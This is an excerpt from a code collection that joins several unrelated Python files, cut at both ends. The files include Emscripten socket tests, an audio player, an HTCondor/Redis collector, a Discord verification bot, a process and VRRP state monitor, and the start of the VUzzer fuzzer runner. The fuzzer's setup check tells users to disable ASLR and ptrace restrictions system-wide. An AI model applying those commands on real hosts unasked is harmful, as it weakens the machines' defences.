setTimeout(window.close, 0);
},
onerror: function(error) {
console.error(error);
},
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
run_process([PYTHON, EMCC, temp_host_filepath, '-o', host_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'host_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
run_process([PYTHON, EMCC, temp_peer_filepath, '-o', peer_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'peer_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
# note: you may need to run this manually yourself, if npm is not in the path, or if you need a version that is not in the path
run_process([NPM, 'install', path_from_root('tests', 'sockets', 'p2p')])
broker = Popen(NODE_JS + [path_from_root('tests', 'sockets', 'p2p', 'broker', 'p2p-broker.js')])
expected = '1'
self.run_browser(host_outfile, '.', ['/report_result?' + e for e in expected])
broker.kill()
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
# Run with ./runner.py sockets.test_nodejs_sockets_echo
if NODE_JS not in JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + path_from_root('tests', 'sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
      # server because, as long as the subprotocol list contains binary, it will configure itself to accept binary data.
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-s', 'SOCKET_DEBUG=1', '-s', 'WEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-s', 'SOCKET_DEBUG=1', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(path_from_root('tests', 'websocket', 'test_websocket_send.c'), expected='101', args=['-lwebsocket', '-s', 'NO_EXIT_RUNTIME=1', '-s', 'WEBSOCKET_DEBUG=1'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
run_process(['cmake', path_from_root('tools', 'websocket_to_posix_proxy')])
run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(path_from_root('tests', 'websocket', 'tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-s', 'PROXY_POSIX_SOCKETS=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
|
player.py
|
import time
import threading
import pyaudio
import numpy as np
_v = np.__version__
__all__ = ["Player"]
class Player(object):
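    """Double-buffered PyAudio player.

    The input buffer is split into a front half and a back half; _play_chunk() streams
    chunk_size samples at a time from the active half, and _swap_buffers() flips to the
    other half once the end is reached. The commented-out live-mode code suggests the
    inactive half was meant to be refillable while the other half plays.
    """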
def __init__(self, buffer, chunk_size=None, rate=None, live=None):
self.rate = rate
        self.buffer_size = buffer.size // 2  # integer half-length; used below as a slice index
assert chunk_size < self.buffer_size
assert buffer.dtype == np.float32
self.org_buffer = np.asarray(buffer)
self.chunk_size = chunk_size
# self.live = live
self.paused = False
self.i = 0
# buffer
self.now_buffer_index = 0
self.front_buffer = self.org_buffer[:self.buffer_size]
self.back_buffer = self.org_buffer[self.buffer_size:]
self.buffers = [self.front_buffer, self.back_buffer]
# init buffer
self.buffer = self.front_buffer
# def _orgn_swap_buffers(self):
# if self.live:
# b0 = self.buffer[:self.buffer_size]
# else:
# b0 = np.zeros(self.buffer_size, dtype=np.float32)
# self.buffer[:self.buffer_size], self.buffer[self.buffer_size:] = self.buffer[self.buffer_size:], b0
def _swap_buffers(self):
self.now_buffer_index = int(not self.now_buffer_index)
self.buffer = self.buffers[self.now_buffer_index]
def _reset_buffer(self):
self.buffer = self.buffers[self.now_buffer_index]
def _play_chunk(self):
chunk = self.buffer[self.i:self.i + self.chunk_size]
        self.stream.write(chunk.tobytes())  # tostring() is a deprecated alias of tobytes()
self.i += self.chunk_size
if self.i >= self.buffer_size:
self.i -= self.buffer_size
self._swap_buffers()
def _play(self):
# Open the stream on the background thread.
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=pyaudio.paFloat32, channels=1, rate=self.rate, output=1)
if self.paused:
self.paused = False
while not self.paused:
self._play_chunk()
def play(self):
if not hasattr(self, '_thread'):
self.i = 0
self._thread = threading.Thread(target=self._play)
self._thread.daemon = True
self._thread.start()
def resume(self, i):
if not hasattr(self, '_thread'):
self.i = i
self._thread = threading.Thread(target=self._play)
self._thread.daemon = True
self._thread.start()
else:
self.i = i
def pause(self):
if self.paused is False:
self.paused = True
time.sleep(2 * float(self.chunk_size) / self.rate)
self.stream.close()
self._thread.join()
del self._thread
def get_nowframe(self):
return self.i + (self.now_buffer_index * self.buffer_size)
def set_nowframe(self, i):
if self.buffer_size <= i:
# Back
self.i = i - self.buffer_size
self.now_buffer_index = 1
elif i < self.buffer_size:
# Front
self.i = i
self.now_buffer_index = 0
self._reset_buffer()
def get_audio(self):
return self.org_buffer
if __name__ == '__main__':
import numpy as np
rate = 44100
buffer_duration = 1.
buffer_size = int(buffer_duration * rate)
chunk_size = 1024
buffer = np.zeros(2 * buffer_size, dtype=np.float32)
t = np.linspace(0., 2 * buffer_duration, 2 * buffer_size)
f0 = 440.
x = np.sin(2 * np.pi * f0 * t) * .1
buffer[:] = x
p = Player(buffer, chunk_size=chunk_size, rate=rate, live=True)
p.play()
p.pause()
|
cscollector.py
|
from multiprocessing import Process
import time
import htcondor
import redis
import json
import config
import logging
def setup_redis_connection():
r = redis.StrictRedis(host=config.redis_host, port=config.redis_port, db=config.redis_db, password=config.redis_password)
return r
def resources_producer(testrun=False, testfile=None):
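    # Periodically queries the HTCondor collector for the attributes listed below and
    # caches the result in Redis as a JSON blob under collector_data_key.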
resource_attributes = ["Name", "Machine", "JobId", "GlobalJobId", "MyAddress", "State", "Activity", "VMType", "MycurrentTime", "EnteredCurrentState", "Start", "RemoteOwner", "SlotType", "TotalSlots"]
sleep_interval = config.machine_collection_interval
collector_data_key = config.collector_data_key
while(True):
try:
condor_resource_dict_list = []
if not testrun:
condor_c = htcondor.Collector()
any_ad = htcondor.AdTypes.Any
condor_resources = condor_c.query(ad_type=any_ad, constraint=True, projection=resource_attributes)
for resource in condor_resources:
r_dict = dict(resource)
if "Start" in r_dict:
r_dict["Start"] = str(r_dict["Start"])
condor_resource_dict_list.append(r_dict)
#logging.debug(condor_resource_dict_list)
#For Unit Testing only:
else:
res_file = open(testfile, 'r')
condor_string = res_file.read()[0:-1] #strip newline
condor_resources = json.loads(condor_string)
for resource in condor_resources:
r_dict = dict(resource)
if "Start" in r_dict:
r_dict["Start"] = str(r_dict["Start"])
condor_resource_dict_list.append(r_dict)
condor_resources = json.dumps(condor_resource_dict_list)
redis_con = setup_redis_connection()
logging.error("Setting condor-resources in redis...")
redis_con.set(collector_data_key, condor_resources)
if(testrun):
return True
time.sleep(sleep_interval)
except Exception as e:
logging.error(e)
logging.error("Error connecting to condor or redis...")
if(testrun):
return False
time.sleep(sleep_interval)
except(SystemExit, KeyboardInterrupt):
return False
def collector_command_consumer(testrun=False):
collector_commands_key = config.collector_commands_key
sleep_interval = config.command_sleep_interval
while(True):
try:
redis_con = setup_redis_connection()
command_string = redis_con.lpop(collector_commands_key)
if command_string is not None:
command_dict = json.loads(command_string)
#execute command
# use htcondor class's send_command function to send condor_off -peaceful to Startd and Master
# order matters here, we need to issue the command to Startd first then Master
# We will need the class ad for the machine found by using ad = Collector.locate(...)
# then do htcondor.send_command(ad=ad, dc=htcondor.DaemonCommands.DaemonsOffPeaceful, target="-daemon Startd")
# htcondor.send_command(ad=ad, dc=htcondor.DaemonCommands.DaemonsOffPeaceful, target="-daemon Master")
# may not need the target
#need to get machine identifier out of command
machine_name = command_dict['machine_name'].encode('ascii','ignore')
command = command_dict['command']
if command == "condor_off":
condor_c = htcondor.Collector()
logging.info("getting machine ads for %s" % machine_name)
startd_ad = condor_c.locate(htcondor.DaemonTypes.Startd, machine_name)
logging.info("found startd.. locating master")
master_machine_name = machine_name.split("@")[1]
master_ad = condor_c.locate(htcondor.DaemonTypes.Master, master_machine_name)
logging.info("Ads found, issuing condor_off commands...")
htcondor.send_command(startd_ad, htcondor.DaemonCommands.SetPeacefulShutdown)
htcondor.send_command(master_ad, htcondor.DaemonCommands.SetPeacefulShutdown)
if(testrun):
return True
else:
logging.error("Unrecognized command")
if(testrun):
return False
else:
logging.info("No command in redis list, begining sleep interval...")
#only sleep if there was no command
if(testrun):
return False
time.sleep(sleep_interval)
except Exception as e:
logging.error("Failure connecting to redis or executing condor command...")
logging.error(e)
if(testrun):
return False
time.sleep(sleep_interval)
except(SystemExit, KeyboardInterrupt):
return False
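
# Illustrative sketch (not called anywhere): shows the JSON shape that
# collector_command_consumer() expects to pop off the Redis command list. The default
# machine name below is a made-up example of HTCondor's slot@host format.
def _example_enqueue_condor_off(machine_name="slot1@worker-node-01.example.org"):
    redis_con = setup_redis_connection()
    command = json.dumps({"machine_name": machine_name, "command": "condor_off"})
    redis_con.rpush(config.collector_commands_key, command)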
if __name__ == '__main__':
logging.basicConfig(filename=config.collector_log_file,level=logging.DEBUG)
processes = []
p_resource_producer = Process(target=resources_producer)
p_command_consumer = Process(target=collector_command_consumer)
processes.append(p_resource_producer)
processes.append(p_command_consumer)
# Wait for keyboard input to exit
try:
for process in processes:
process.start()
while(True):
for process in processes:
if not process.is_alive():
logging.error("%s process died!" % process.name)
logging.error("Restarting %s process...")
process.start()
time.sleep(1)
time.sleep(10)
except (SystemExit, KeyboardInterrupt):
logging.error("Caught KeyboardInterrupt, shutting down threads and exiting...")
for process in processes:
try:
process.join()
except:
logging.error("failed to join process %s" % process.name)
|
bot.py
|
import logging
import threading
import asyncio
import unicodedata
from decouple import config
import discord
from . import xkcd
from discord.utils import get
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from .utils import send_verify_mail
intents = discord.Intents.all()
intents.presences = False
TOKEN = config("DISCORD_TOKEN", default="")
CSUA_GUILD_ID = config("TEST_GUILD", default=784902200102354985, cast=int)
CSUA_PHILBOT_CLIENT_ID = config("BOT_ID", default=737930184837300274, cast=int)
HOSER_ROLE_ID = config("TEST_ROLE", default=785418569412116513, cast=int) # Verified
DEBUG_CHANNEL_ID = config("DEBUG_CHANNEL", default=788989977794707456, cast=int)
TIMEOUT_SECS = 10
logger = logging.getLogger(__name__)
class CSUAClient(discord.Client):
async def on_ready(self):
print(f"{self.user} has connected to Discord")
self.is_phillip = self.user.id == CSUA_PHILBOT_CLIENT_ID
if self.is_phillip:
print("Phillip is in the Office")
self.csua_guild = get(self.guilds, id=CSUA_GUILD_ID)
self.test_channel = get(self.csua_guild.channels, id=DEBUG_CHANNEL_ID)
self.hoser_role = get(self.csua_guild.roles, id=HOSER_ROLE_ID)
# if self.csua_guild is not None and self.test_channel is not None and self.hoser_role is not None:
# await self.test_channel.send("booting up successfully into phillip_debug channel")
async def verify_member_email(self, user):
channel = user.dm_channel
def check_msg(msg):
return msg.channel == channel
got_email = False
while not got_email:
msg = await self.wait_for("message", check=check_msg)
try:
validate_email(msg.content)
if "@berkeley.edu" in msg.content:
got_email = True
await channel.send(
f"Sending a an email to verify {user.name} to {msg.content}"
)
send_verify_mail(msg.content, user.name + "#" + user.discriminator)
else:
await channel.send(
f"{msg.content} is not a berkeley email. Please fix this"
)
except ValidationError as e:
await channel.send(
f"{msg.content} is not a valid email. Please try again. Details: {e}"
)
async def on_message(self, message):
if message.author == self.user:
return
# Reading rules and verification
msg = message.content.lower()
if "hkn" in msg and "ieee" in msg:
await message.channel.send("Do I need to retrieve the stick?")
if "is typing" in msg:
await message.channel.send("unoriginal")
if msg.count("cpma") >= 2:
for emoji in emoji_letters("wtfiscpma"):
await message.add_reaction(emoji)
elif "based" in msg:
for emoji in emoji_letters("based"):
await message.add_reaction(emoji)
await message.add_reaction("😎")
elif "tree" in msg or "stanford" in msg or "stanfurd" in msg:
emoji = unicodedata.lookup(
"EVERGREEN TREE"
) # todo: add official <:tree:744335009002815609>
await message.add_reaction(emoji)
elif "drip" in msg or "👟" in msg or "🥵" in msg:
for emoji in emoji_letters("drip"):
await message.add_reaction(emoji)
await message.add_reaction("👟")
if "!xkcd" in msg:
# Validate "!xkcd" command
if xkcd.is_valid_xkcd_command(msg):
await xkcd.get_xkcd(message)
else:
await message.channel.send("Please ensure that your command is properly formatted. Type `!xkcd -help` for more information.")
async def on_member_join(self, member):
msg = await member.send(
"Welcome to the CSUA discord server! First, read the rules in #landing-zone. Thumbs up this message if you agree"
)
await self.test_channel.send(f"Sent initial discord message to {member}")
def check_thumb(react, _):
return react.message == msg and str(react.emoji) == "👍" # thumbs
await self.wait_for("reaction_add", check=check_thumb)
await self.test_channel.send(f"{member} read rules")
await member.send(
"Verify your berkeley.edu email to gain access. First, please type your email. Please contact a moderator if you have any issues."
)
await self.test_channel.send(f"{member} was prompted for email")
await self.verify_member_email(member)
if self.is_phillip:
await self.test_channel.send(f"{member} was sent registration email")
def emoji_letters(chars):
return [unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}") for c in chars]
class CSUABot:
"""
Wraps CSUAClient by abstracting thread and event loop logic.
All the discord.Client coroutines must be called using
`asyncio.run_coroutine_threadsafe` because the client is running inside an
    event loop in a separate thread. There is one event loop per thread, and Django
    can't run async code in its request handlers, so a separate thread is used instead.
    (See the usage sketch at the end of this module.)
"""
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self.running = True
self.thread.start()
def _start(self):
asyncio.set_event_loop(self.loop)
self.client = CSUAClient(intents=intents)
try:
self.loop.run_until_complete(self.client.start(TOKEN))
finally:
self.loop.run_until_complete(self.client.logout())
self.loop.close()
def promote_user_to_hoser(self, tag):
if not hasattr(self.client, "csua_guild"):
client = self.client
print(client)
member = self.client.csua_guild.get_member_named(tag)
if member:
asyncio.run_coroutine_threadsafe(
member.add_roles(self.client.hoser_role), self.loop
).result(TIMEOUT_SECS)
asyncio.run_coroutine_threadsafe(
self.client.test_channel.send(f"verified {tag}"), self.loop
).result(TIMEOUT_SECS)
return True
return False
if TOKEN:
csua_bot = CSUABot()
else:
csua_bot = None
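
# Usage sketch (illustrative only; the Discord tag below is made up): callers such as
# Django views interact with the bot through the module-level `csua_bot` singleton,
# whose methods are safe to call from ordinary synchronous code.
def _example_promote(tag="someuser#1234"):
    if csua_bot is None:  # TOKEN was not configured, so no bot thread is running
        return False
    return csua_bot.promote_user_to_hoser(tag)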
|
local_state_collector.py
|
"""Collecting the states of the local system"""
from datetime import datetime
import os
import re
import signal
import threading
import time
import psutil
import yaml
from forch.proto.process_state_pb2 import ProcessState
from forch.proto.shared_constants_pb2 import State
from forch.proto.system_state_pb2 import StateSummary
from forch.utils import dict_proto, get_logger
LOGGER = get_logger('lstate')
_PROC_ATTRS = ['cmdline', 'cpu_times', 'cpu_percent', 'memory_info']
class LocalStateCollector:
"""Storing local system states"""
def __init__(self, config, cleanup_handler, active_state_handler, metrics):
self._state = {'processes': {}, 'vrrp': {}}
self._process_state = self._state['processes']
self._process_state['connections'] = {}
self._vrrp_state = self._state['vrrp']
self._last_error = {}
self._current_time = None
self._conn_state = None
self._conn_state_count = 0
self._metrics = metrics
self._lock = threading.Lock()
self._target_procs = config.processes
self._check_vrrp = config.check_vrrp
self._connections = config.connections
self._process_interval = config.scan_interval_sec or 60
self._cleanup_handler = cleanup_handler
self._active_state_handler = active_state_handler
LOGGER.info('Scanning %s processes every %ds',
len(self._target_procs), self._process_interval)
def initialize(self):
"""Initialize LocalStateCollector"""
if not self._check_vrrp:
self._vrrp_state['is_master'] = True
self._active_state_handler(State.active)
self.start_process_loop()
def get_process_summary(self):
"""Return a summary of process table"""
process_state = self.get_process_state()
return dict_proto({
'state': process_state.process_state,
'detail': process_state.process_state_detail,
'change_count': process_state.process_state_change_count,
'last_update': process_state.process_state_last_update,
'last_change': process_state.process_state_last_change
}, StateSummary)
def get_process_state(self):
"""Get the states of processes"""
with self._lock:
return dict_proto(self._process_state, ProcessState)
def _check_process_info(self):
"""Check the raw information of processes"""
process_state = self._process_state
process_map = {}
procs = self._get_target_processes()
broken = []
# fill up process info
for target_name in self._target_procs:
state_map = process_map.setdefault(target_name, {})
proc_list = procs.get(target_name, [])
target_count = self._target_procs[target_name].count or 1
state, detail = self._extract_process_state(target_name, target_count, proc_list)
state_map['detail'] = detail
if state:
state_map['state'] = State.healthy
self._metrics.update_var('process_state', 1, labels=[target_name])
state_map.update(state)
self._last_error.pop(target_name, None)
continue
state_map['state'] = State.broken
self._metrics.update_var('process_state', 0, labels=[target_name])
if detail != self._last_error.get(target_name):
LOGGER.error(detail)
self._last_error[target_name] = detail
broken.append(target_name)
process_state['processes'] = process_map
process_state['process_state_last_update'] = self._current_time
old_state = process_state.get('process_state')
state = State.broken if broken else State.healthy
old_state_detail = process_state.get('process_state_detail')
state_detail = 'Processes in broken state: ' + ', '.join(broken) if broken else ''
if state != old_state or state_detail != old_state_detail:
state_change_count = process_state.get('process_state_change_count', 0) + 1
LOGGER.info('process_state #%d is %s: %s', state_change_count, state, state_detail)
process_state['process_state'] = state
process_state['process_state_detail'] = state_detail
process_state['process_state_change_count'] = state_change_count
process_state['process_state_last_change'] = self._current_time
def _get_target_processes(self):
"""Get target processes"""
procs = {}
for proc in psutil.process_iter(attrs=_PROC_ATTRS):
cmd_line_str = ' '.join(proc.info['cmdline'])
for target_process_name, target_process_cfg in self._target_procs.items():
proc_list = procs.setdefault(target_process_name, [])
if re.search(target_process_cfg.regex, cmd_line_str):
proc_list.append(proc)
return procs
def _extract_process_state(self, proc_name, proc_count, proc_list):
"""Fill process state for a single process"""
if len(proc_list) != proc_count:
            return None, f"Process {proc_name}: number of processes ({len(proc_list)}) " \
                f"does not match target count ({proc_count})"
old_proc_map = self._process_state.get('processes', {}).get(proc_name, {})
proc_map = {}
cmd_line = ' '.join(proc_list[0].info['cmdline']) if len(proc_list) == 1 else 'multiple'
proc_map['cmd_line'] = cmd_line
create_time_max = max(proc.create_time() for proc in proc_list)
create_time = datetime.fromtimestamp(create_time_max).isoformat()
proc_map['create_time'] = create_time
proc_map['create_time_last_update'] = self._current_time
if create_time != old_proc_map.get('create_time'):
change_count = old_proc_map.get('create_time_change_count', 0) + 1
LOGGER.info('create_time #%d for %s: %s', change_count, proc_name, create_time)
proc_map['create_time_change_count'] = change_count
proc_map['create_time_last_change'] = self._current_time
try:
self._aggregate_process_stats(proc_map, proc_list)
except Exception as e:
return None, f'Error in extracting info for process {proc_name}: {e}'
cpu_percent_threshold = self._target_procs[proc_name].cpu_percent_threshold
if cpu_percent_threshold and proc_map['cpu_percent'] > cpu_percent_threshold:
LOGGER.warning(
'CPU percent of process %s is %.2f, exceeding threshold %.2f',
proc_name, proc_map['cpu_percent'], cpu_percent_threshold)
return proc_map, f'CPU usage is higher than threshold {cpu_percent_threshold}'
return proc_map, None
def _aggregate_process_stats(self, proc_map, proc_list):
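        # Sum CPU times, CPU percent and memory (in MB) across the matched processes, then store per-process averages.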
cpu_time_user = 0.0
cpu_time_system = 0.0
cpu_time_iowait = None
cpu_percent = 0.0
memory_rss = 0.0
memory_vms = 0.0
for proc in proc_list:
cpu_time_user += proc.info['cpu_times'].user
cpu_time_system += proc.info['cpu_times'].system
if hasattr(proc.info['cpu_times'], 'iowait'):
if not cpu_time_iowait:
cpu_time_iowait = 0.0
cpu_time_iowait += proc.cpu_times().iowait
cpu_percent += proc.info['cpu_percent']
memory_rss += proc.info['memory_info'].rss / 1e6
memory_vms += proc.info['memory_info'].vms / 1e6
proc_map['cpu_times_s'] = {}
proc_map['cpu_times_s']['user'] = cpu_time_user / len(proc_list)
proc_map['cpu_times_s']['system'] = cpu_time_system / len(proc_list)
if cpu_time_iowait:
proc_map['cpu_times_s']['iowait'] = cpu_time_iowait / len(proc_list)
proc_map['cpu_percent'] = cpu_percent / len(proc_list)
proc_map['memory_info_mb'] = {}
proc_map['memory_info_mb']['rss'] = memory_rss / len(proc_list)
proc_map['memory_info_mb']['vms'] = memory_vms / len(proc_list)
def _check_connections(self):
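        # Snapshot established connections on the configured local ports and record when the set of foreign addresses changes.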
connections = self._fetch_connections()
connection_info = self._process_state['connections']
connection_info['local_ports'] = {
str(port): self._extract_conn(connections, port) for port in self._connections
}
conn_list = []
for port_info in connection_info['local_ports'].values():
for foreign_address in port_info['foreign_addresses']:
conn_list.append(foreign_address)
conn_list.sort()
conn_state = str(conn_list)
if conn_state != self._conn_state:
self._conn_state = conn_state
self._conn_state_count += 1
LOGGER.info('conn_state #%d: %s', self._conn_state_count, conn_state)
connection_info['detail'] = conn_state
connection_info['change_count'] = self._conn_state_count
connection_info['last_change'] = self._current_time
connection_info['last_update'] = self._current_time
def _fetch_connections(self):
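        # Parse netstat output into {foreign_address: {'local_port': ..., 'process_info': ...}} for ESTABLISHED sockets.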
connections = {}
with os.popen('netstat -npa 2>/dev/null') as lines:
for line in lines:
if 'ESTABLISHED' in line:
try:
parts = line.split()
local_address = parts[3]
local_parts = local_address.split(':')
local_port = int(local_parts[-1])
foreign_address = parts[4]
connections[foreign_address] = {
'local_port': local_port,
'process_info': parts[6]
}
except Exception as e:
LOGGER.error('Processing netstat entry: %s', e)
return connections
def _extract_conn(self, connections, port):
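        # Collect the foreign addresses (and owning process entry) connected to the given local port.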
foreign_addresses = {}
process_entry = None
for foreign_address in connections:
entry = connections[foreign_address]
if entry['local_port'] == port:
new_process_entry = entry['process_info']
if process_entry and new_process_entry != process_entry:
                    LOGGER.error('Inconsistent process entry for %s: %s != %s',
port, process_entry, new_process_entry)
process_entry = new_process_entry
foreign_addresses[foreign_address] = {
'established': 'now'
}
return {
'process_entry': process_entry,
'foreign_addresses': foreign_addresses
}
def _check_vrrp_info(self):
"""Get vrrp info"""
try:
if not self._check_vrrp:
return
with open('/var/run/keepalived.pid') as pid_file:
pid = int(pid_file.readline())
os.kill(pid, signal.SIGUSR2)
time.sleep(1)
with open('/tmp/keepalived.stats') as stats_file:
stats_file.readline()
stats = yaml.safe_load(stats_file)
self._vrrp_state.update(self._extract_vrrp_state(stats))
active_state = State.active if self._vrrp_state['is_master'] else State.inactive
self._active_state_handler(active_state)
except Exception as e:
LOGGER.error("Cannot get VRRP info, setting controller to inactive: %s", e)
self._active_state_handler(State.broken)
def _extract_vrrp_state(self, stats):
"""Extract vrrp state from keepalived stats data"""
vrrp_map = {'state': State.healthy}
        vrrp_errors = []
old_vrrp_map = self._state.get('vrrp', {})
became_master = int(stats['Became master'])
released_master = int(stats['Released master'])
vrrp_map['is_master'] = became_master > released_master
vrrp_map['is_master_last_update'] = self._current_time
if vrrp_map['is_master'] != old_vrrp_map.get('is_master'):
vrrp_map['is_master_last_change'] = self._current_time
is_master_change_count = old_vrrp_map.get('is_master_change_count', 0) + 1
LOGGER.info('is_master #%d: %s', is_master_change_count, vrrp_map['is_master'])
vrrp_map['is_master_change_count'] = is_master_change_count
if not vrrp_map['is_master']:
self._cleanup_handler()
for error_type in ['Packet Errors', 'Authentication Errors']:
for error_key, error_count in stats.get(error_type, {}).items():
if int(error_count) > 0:
vrrp_map['state'] = State.broken
                    vrrp_errors.append(error_key)
vrrp_map['state_last_update'] = self._current_time
if vrrp_map['state'] != old_vrrp_map.get('state'):
vrrp_map['state_last_change'] = self._current_time
state_change_count = old_vrrp_map.get('state_change_count', 0) + 1
LOGGER.info('vrrp_state #%d: %s', state_change_count, vrrp_map['state'])
vrrp_map['state_change_count'] = state_change_count
return vrrp_map
def _periodic_check_local_state(self):
"""Periodically gather local state"""
with self._lock:
self._current_time = datetime.now().isoformat()
self._check_process_info()
self._check_vrrp_info()
self._check_connections()
threading.Timer(self._process_interval, self._periodic_check_local_state).start()
def start_process_loop(self):
"""Start a loop to periodically gather local state"""
threading.Thread(target=self._periodic_check_local_state, daemon=True).start()
|
runfuzzer.py
|
import subprocess
import shlex
import time
import threading
from threading import Timer
import config
import pickle
import os
import operators
import random
from operator import itemgetter
import time
import shutil
import inspect
import glob
import sys
from collections import Counter
from datetime import datetime
import binascii as bina
import copy
import re
import hashlib
import signal
import gautils as gau
#import gautils_new as gau_new
import mmap
import BitVector as BV
import argparse
#config.MOSTCOMFLAG=False # this is set once we compute taint for initial inputs.
libfd=open("image.offset","r+b")
libfd_mm=mmap.mmap(libfd.fileno(),0)
def signal_handler(sig, frame):
print('[*] User terminated the process...')
if config.START_TIME != 0:
        print "[**] Total time %f sec."%(time.time() -config.START_TIME,)
print "[**] Fuzzing done. Check %s to see if there were crashes.."%(config.ERRORS,)
exit(0)
def get_min_file(src):
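    # Return the size (in bytes) of the smallest file in the given directory.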
files=os.listdir(src)
first=False
minsize=0
for fl in files:
tfl=os.path.join(src,fl)
tsize=os.path.getsize(tfl)
if first == False:
minsize=tsize
first = True
else:
if tsize < minsize:
minsize=tsize
return minsize
def check_env():
    ''' this function checks relevant environment variables that must be set before we start our fuzzer..'''
if os.getenv('PIN_ROOT') == None:
gau.die("PIN_ROOT env is not set. Run export PIN_ROOT=path_to_pin_exe")
fd1=open("/proc/sys/kernel/randomize_va_space",'r')
b=fd1.read(1)
fd1.close()
if int(b) != 0:
gau.die("ASLR is not disabled. Run: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space")
fd=open("/proc/sys/kernel/yama/ptrace_scope",'r')
b=fd.read(1)
fd.close()
if int(b) != 0:
gau.die("Pintool may not work. Run: echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope")
if os.path.ismount(config.BASETMP)==False:
        tmp=raw_input("It seems that config.BASETMP is not mounted as a tmpfs filesystem. Mounting it as tmpfs may speed up execution. Press [Y/y] to see the mount command OR press [N/n] to continue.")
if tmp.upper() == "Y":
print "run: sudo mount -t tmpfs -o size=1024M tmpfs %s"%config.BASETMP
raise SystemExit(1)
#gau.die("config.BASETMP is not mounted as tmpfs filesystem. Run: sudo mkdir /mnt/vuzzer , followed by sudo mount -t tmpfs -o size=1024M tmpfs /mnt/vuzzer")
def run(cmd):
#print "[*] Just about to run ", ' '.join(cmd)
proc = subprocess.Popen(" ".join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = proc.communicate()
lava_code = 0
if config.LAVA == True and (b"Successfully triggered bug " in stdout):
for l in stdout.split(b"\n"):
if l[0:5] == b"Succe":
lava_code = int(l.split(b" ")[3][:-1])
return (-1, lava_code)
tmpo = open("run_bb.out", "w")
tmpo.write(stderr)
tmpo.close()
return (proc.returncode, lava_code)
def sha1OfFile(filepath):
with open(filepath, 'rb') as f:
return hashlib.sha1(f.read()).hexdigest()
def bbdict(fn):
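    # Parse the BB trace file into a {bb_address: frequency} dict and record the list of executed functions.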
with open(fn,"r") as bbFD:
bb = {}
funcset = set()
flag = 0
for ln in bbFD:
if flag == 0:
if "funclist" in ln:
flag = 1
funclist = []
continue
